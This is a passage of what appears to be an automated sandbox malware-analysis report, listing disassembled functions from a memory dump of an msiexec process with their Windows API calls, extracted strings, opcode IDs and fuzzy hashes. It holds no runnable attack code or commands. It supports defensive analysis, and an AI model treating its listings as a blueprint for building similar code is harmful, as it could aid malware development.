                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                    • memset.MSVCRT ref: 00405455
                                                                    • memset.MSVCRT ref: 0040546C
                                                                    • memset.MSVCRT ref: 00405483
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy$ErrorLast
                                                                    • String ID: 6$\
                                                                    • API String ID: 404372293-1284684873
                                                                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                    Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLastSleep$free
                                                                    • String ID:
                                                                    • API String ID: 1470729244-0
                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                    • String ID:
                                                                    • API String ID: 1331804452-0
                                                                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                    • String ID: advapi32.dll
                                                                    • API String ID: 2012295524-4050573280
                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                    • <%s>, xrefs: 004100A6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf
                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                    • API String ID: 3473751417-2880344631
                                                                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset
                                                                    • String ID: %2.2X
                                                                    • API String ID: 2521778956-791839006
                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfwcscpy
                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                    • API String ID: 999028693-502967061
                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                    • memset.MSVCRT ref: 00408E46
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2350177629-0
                                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-1606337402
                                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                    • memset.MSVCRT ref: 00408FD4
                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                    • memset.MSVCRT ref: 00409042
                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 265355444-0
                                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004116FF
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2618321458-3614832568
                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFilefreememset
                                                                    • String ID:
                                                                    • API String ID: 2507021081-0
                                                                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                    • malloc.MSVCRT ref: 00417524
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                    • free.MSVCRT ref: 00417544
                                                                    • free.MSVCRT ref: 00417562
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                    • String ID:
                                                                    • API String ID: 4131324427-0
                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                    • free.MSVCRT ref: 0041822B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$free
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 924794160-1420421710
                                                                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                    • API String ID: 1775345501-2769808009
                                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                    • String ID: Error$Error %d: %s
                                                                    • API String ID: 313946961-1552265934
                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                    • API String ID: 0-1953309616
                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                    Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                    • memset.MSVCRT ref: 0040C439
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1265369119-0
                                                                    • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                    • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: gj
                                                                    • API String ID: 1297977491-4203073231
                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
